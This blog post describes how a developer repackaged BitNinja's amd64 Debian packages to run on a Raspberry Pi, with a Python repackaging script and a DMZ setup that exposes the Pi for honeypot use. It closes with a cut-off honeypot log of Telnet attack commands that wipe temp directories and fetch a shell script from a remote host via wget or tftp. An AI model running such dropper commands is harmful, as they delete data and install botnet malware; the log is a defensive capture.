Pi-Ninja-Security for RaspberryPi

The real geek came out in one of our Ninjastic developers lately: in his free time he decided to try to install BitNinja on his Raspberry Pi 2 model B. And guess what happened? He was successful! What is more, BitNinja also captured some attacks with its port honeypot module. Now let me describe the installation process and what exactly he found.

So the device is a Raspberry Pi 2 model B, and it runs Raspbian GNU/Linux 8.

The process:

BitNinja is not available for the ARM architecture, so he was not able to install it from the BitNinja Debian repository. To bypass this, he downloaded the packages directly from the repository:

wget http://apt.bitninja.io/debian/pool/non-free/b/bitninja-dojo/bitninja-dojo_LATEST_VERSION_amd64.deb
wget http://apt.bitninja.io/debian/pool/non-free/b/bitninja/bitninja_LATEST_VERSION_amd64.deb

"bitninja" is the client itself.

"bitninja-dojo" is a standalone PHP executable.

He started with the "bitninja-dojo" package, as the "bitninja" package depends on it.

1, Create a directory for it

mkdir bitninja-dojo_armhf

2, Move the downloaded .deb file into the directory

mv bitninja-dojo_LATEST_VERSION_amd64.deb bitninja-dojo_armhf/bitninja-dojo_amd64.deb

3, Open the directory

cd bitninja-dojo_armhf

4, Unpack the .deb file (it is a plain ar archive) with this command:

ar vx bitninja-dojo_amd64.deb

5, Delete it (the file was renamed in step 2, so use the new name)

rm bitninja-dojo_amd64.deb

After unpacking, we get 3 files:

debian-binary

data.tar.gz -> contains all the files installed by the package

control.tar.gz -> this archive contains the dependencies of the package and the step-by-step instructions for the installation (the control file and the maintainer scripts)

6, Create a new directory

mkdir control

7, Move control.tar.gz to the new directory and enter it

mv control.tar.gz control/
cd control

8, Extract it

tar -zxvf control.tar.gz

9, Delete the archive

rm control.tar.gz

10, After this, open the control file in an editor:

mcedit control

11, Find the following line and change it

This:

Architecture: amd64

To this:

Architecture: armhf

12, Save it

13, Check the dependencies of the package (in the control file):

Depends: libc6 (>= 2.11), zlib1g (>= 1:1.1.4)

So it depends on two packages: libc6 and zlib1g.

As the control file does not specify which architecture these dependencies must come from, apt should fetch them from one of the configured repositories during the installation.

Just to make sure it works 100%, he installed them beforehand.

apt-get update
apt-get install libc6 zlib1g

14, Now it is time to compress the content of the control directory again:

tar czf control.tar.gz *

15, Move it up one level, and go back to the parent directory:

mv control.tar.gz ../
cd ..

16, Delete the control directory

rm -r control

17, It is time to repackage the 3 files into 1 .deb file

ar r bitninja-dojo_armhf.deb debian-binary control.tar.gz data.tar.gz

18, You can install it with this command:

dpkg -i bitninja-dojo_armhf.deb

As a matter of fact, we only had to modify the architecture, nothing else.

With the BitNinja package, you should follow the same steps as in the case of BitNinja-dojo.

19, Repeat steps 1 to 12, then check the dependencies of the bitninja package:

Depends: bitninja-dojo (>= 1.6), ipset, daemon, iptables (>= 1.4.7), awk, net-tools, grep, gzip, sed, coreutils, lsb-release

As the BitNinja dojo is already installed, we only need to work with the other dependencies.

As mentioned, the package should pull in its dependencies by itself. He installed them manually anyway, because he was not sure this would work for bitninja: he ran into an issue with the awk package:

Reading package lists... Done
Building dependency tree
Reading state information... Done
Package awk is a virtual package provided by:
original-awk 2012-12-20-2
mawk 1.3.3-17
gawk 1:4.1.1+dfsg-1
You should explicitly select one to install.

E: Package ‘awk’ has no installation candidate

Instead, he installed gawk.

20, The whole command:

apt-get install ipset daemon iptables gawk net-tools grep gzip sed coreutils lsb-release

21, Follow the steps from 14 to 18
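Steps 1 to 18, repeated in step 21 for the bitninja package, boil down to rewriting one field, so here they are as one script. This is an added example, not part of the post or of BitNinja's own tooling: it parses the .deb (an ar archive) itself, so it needs neither ar nor mcedit, changes only the Architecture field of the control file, and passes debian-binary and data.tar.* through byte for byte. The function names and the sample control file are constructed for the example; unlike the post's .gz-only steps it also accepts control.tar.xz.

```python
import io
import tarfile
AR_MAGIC = b"!<arch>\n"   # a .deb is a plain 'ar' archive: debian-binary, control.tar.*, data.tar.*

def read_ar(blob):
    """Split an ar archive into an ordered list of (name, bytes), like 'ar x' in step 4."""
    assert blob[:8] == AR_MAGIC, "not an ar archive"
    members, pos = [], 8
    while pos + 60 <= len(blob):                    # 60-byte header, then data padded to even length
        hdr = blob[pos:pos + 60]
        name, size = hdr[:16].decode().rstrip(" /"), int(hdr[48:58])
        members.append((name, blob[pos + 60:pos + 60 + size]))
        pos += 60 + size + size % 2
    return members

def write_ar(members):                              # the inverse, like 'ar r' in step 17
    out = bytearray(AR_MAGIC)
    for name, data in members:
        out += f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode()
        out += data + (b"\n" if len(data) % 2 else b"")
    return bytes(out)

def set_architecture(control_tar, comp, new_arch):
    """Rewrite only the Architecture: field of 'control' inside control.tar.<comp> (steps 6 to 14)."""
    src, buf = tarfile.open(fileobj=io.BytesIO(control_tar), mode="r:*"), io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:" + comp) as dst:
        for m in src.getmembers():
            payload = src.extractfile(m) if m.isfile() else None
            if m.isfile() and m.name.lstrip("./") == "control":
                text = "".join(f"Architecture: {new_arch}\n" if ln.startswith("Architecture:") else ln
                               for ln in payload.read().decode().splitlines(keepends=True))
                payload, m.size = io.BytesIO(text.encode()), len(text.encode())
            dst.addfile(m, payload)                 # conffiles, maintainer scripts etc. pass through unchanged
    return buf.getvalue()

def repack_deb(deb_bytes, new_arch):
    """Steps 1 to 18 in one call: control.tar.* is rewritten, debian-binary and data.tar.* are kept as is."""
    return write_ar([(n, set_architecture(d, n.rsplit(".", 1)[-1], new_arch) if n.startswith("control.tar") else d)
                     for n, d in read_ar(deb_bytes)])

def read_control(deb_bytes):                        # control file text of a .deb, to check the result
    tar = tarfile.open(fileobj=io.BytesIO(next(d for n, d in read_ar(deb_bytes) if n.startswith("control.tar"))), mode="r:*")
    return next(tar.extractfile(m).read().decode() for m in tar.getmembers() if m.isfile() and m.name.lstrip("./") == "control")

def make_tar(path, body, comp="gz"):                # one-file tarball, used only to build constructed sample input
    buf, info = io.BytesIO(), tarfile.TarInfo(path)
    info.size = len(body)
    with tarfile.open(fileobj=buf, mode="w:" + comp) as t:
        t.addfile(info, io.BytesIO(body))
    return buf.getvalue()
```

Feed repack_deb the bytes of the downloaded bitninja-dojo_LATEST_VERSION_amd64.deb and write the result to bitninja-dojo_armhf.deb; read_control shows that the Depends line is untouched, so dpkg still enforces libc6 and zlib1g.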

If you have done everything correctly, BitNinja is now installed on your Raspberry, although for now it will not start yet. The BitNinja client does not use the php package; it runs its PHP code with a standalone binary, bitninja-dojo (/opt/bitninja-dojo/run/bin/bitninja-dojo). He thought it probable that this binary is architecture-dependent.

However, it is easy to replace, as the php binary behaves similarly and is also available on the Raspberry.

22, Install php5 with the curl extension:

apt-get install php5 php5-curl

23, Replace the bitninja-dojo interpreter with the php5 executable in the shebang line of the following files:

/opt/bitninja/bitninja
/usr/sbin/bitninja-config
/usr/sbin/bitninjacli

this line:

#! /opt/bitninja-dojo/run/bin/bitninja-dojo -c=/opt/bitninja/etc

to this:

#!/usr/bin/php --php-ini=/opt/bitninja/etc

24, Set the license key:

bitninja-config --set license_key=LICENSE_KEY

25, Start BitNinja:

/etc/init.d/bitninja start

For him, BitNinja runs smoothly on his server. The load is between 1.5 and 2.0.

If you would like to catch some bad guys with your Raspberry Pi, do the following:

Set your Raspberry's internal IP as the DMZ host in your router's settings; this exposes every port of the Pi to the internet, which is exactly what the port honeypot needs, and you can start the hunting. 🙂

Our developer encountered the following Telnet attacks:

"PORT HIT": "xxx.xx.xxx.xx:46376->192.168.1.93:23",
"MESSAGES": "Array
(
=> sh || bash || shell
=> cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wgethttp://xxx.xx.xxx.xxx/bi.sh || wget http://xxx.xx.xxx.xxx/bi.sh || busybox tftp -r bi2.sh -g xxx.xx.xxx.xxx || tftp -r bi2.sh -g xxx.xx.xxx.xxx || busybox tftp xxx.xx.xxx.xxx
=> cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wgethttp://xxx.xx.xxx.xxx/bi.sh || wget http://xxx.xx.xxx.xxx/bi.sh || busybox tftp -r